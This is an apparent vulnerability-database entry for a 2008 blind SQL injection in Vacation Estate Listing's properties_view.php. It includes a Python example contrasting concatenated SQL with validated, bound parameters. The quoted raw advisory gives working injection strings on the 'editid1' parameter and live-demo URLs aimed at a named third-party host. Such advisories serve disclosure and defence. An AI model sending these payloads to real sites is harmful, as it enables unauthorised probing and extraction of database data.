Vendor: Vacation Estate Listing
By: x0r
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Vacation Estate Listing
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Vacation Estate Listing Blind SQL

Vacation Estate Listing is affected by a blind SQL injection vulnerability in the 'editid1' parameter of the 'properties_view.php' page. By manipulating this parameter, an attacker can inject SQL conditions that are evaluated as part of the application's query. The published examples use the substring() function to check the version of the database server: 'properties_view.php?editid1=2 and substring(@@version,1,1)=4' and 'properties_view.php?editid1=2 and substring(@@version,1,1)=5' each compare the first character of @@version with a digit. According to the advisory below, the first request returns the page without errors while the second shows errors at the bottom of the page, and that difference in the response is what reveals the answer.

Mitigation:

The application should be tested for SQL injection vulnerabilities and any vulnerable parameters should be sanitized. Input validation should be implemented to prevent malicious input from being accepted by the application.
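
The mitigation above, as an added example that is not code from the product or from the advisory: a query built by string concatenation beside a version that validates 'editid1' as an integer and binds it as a parameter. The application's source is not on the page, so the table, its rows and the function names are assumptions, and SQLite stands in for the real database.

```python
import sqlite3

# Constructed stand-in for the listing table; the real schema is not on the page.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE properties (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO properties VALUES (?, ?)",
                   [(1, "Beach house"), (2, "Mountain cabin")])
    return db

def view_vulnerable(db, editid1):
    # Pattern behind this class of bug: the raw parameter is pasted into the
    # SQL text, so anything after the number becomes part of the WHERE clause.
    sql = "SELECT title FROM properties WHERE id = " + editid1
    return db.execute(sql).fetchall()

def view_hardened(db, editid1):
    # 1) Validate: the id must be a short run of ASCII digits, nothing else.
    if not (editid1.isascii() and editid1.isdigit() and len(editid1) <= 9):
        raise ValueError("editid1 must be an integer")
    # 2) Bind: the value travels as a parameter, never as SQL text.
    return db.execute("SELECT title FROM properties WHERE id = ?",
                      (int(editid1),)).fetchall()

def demo():
    db = make_db()
    results = {
        # Constructed true/false tails in the shape of the page's requests
        # (SQLite has no @@version, so a constant comparison stands in).
        "vuln_true": view_vulnerable(db, "2 and 1=1"),
        "vuln_false": view_vulnerable(db, "2 and 1=2"),
        "hard_ok": view_hardened(db, "2"),
    }
    try:
        # The request string quoted on the page never reaches the database.
        view_hardened(db, "2 and substring(@@version,1,1)=5")
        results["hard_rejected"] = False
    except ValueError:
        results["hard_rejected"] = True
    return results

if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The two results from the concatenated query differ only because of the appended condition, which is the response difference the advisory relies on; the validated and bound version gives the request no way to change the query.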
Source

Exploit-DB raw data:

######################################
  Vacation Estate Listing Blind Sql
######################################
Author: x0r
Email: andry2000@hotmail.it
Site: http://w00tz0ne.altervista.org/index.php
Cms Demo: http://vacation.mole-group.com/
######################################

Bug in \properties_view.php

Exploit: properties_view.php?editid1=2 and substring(@@version,1,1)=4 
         properties_view.php?editid1=2 and substring(@@version,1,1)=5
		 
# These are only examples, obviously ^ ^

Live Demo:
http://vacation.mole-group.com/properties_view.php?editid1=2%20and%20substring(@@version,1,1)=4
/ No Error /
          
http://vacation.mole-group.com/properties_view.php?editid1=2%20and%20substring(@@version,1,1)=5
/ Errors in the bottom of the page/
		   
Greets: Children Of Ghaza....And My Sweety Girl <3

# milw0rm.com [2008-12-30]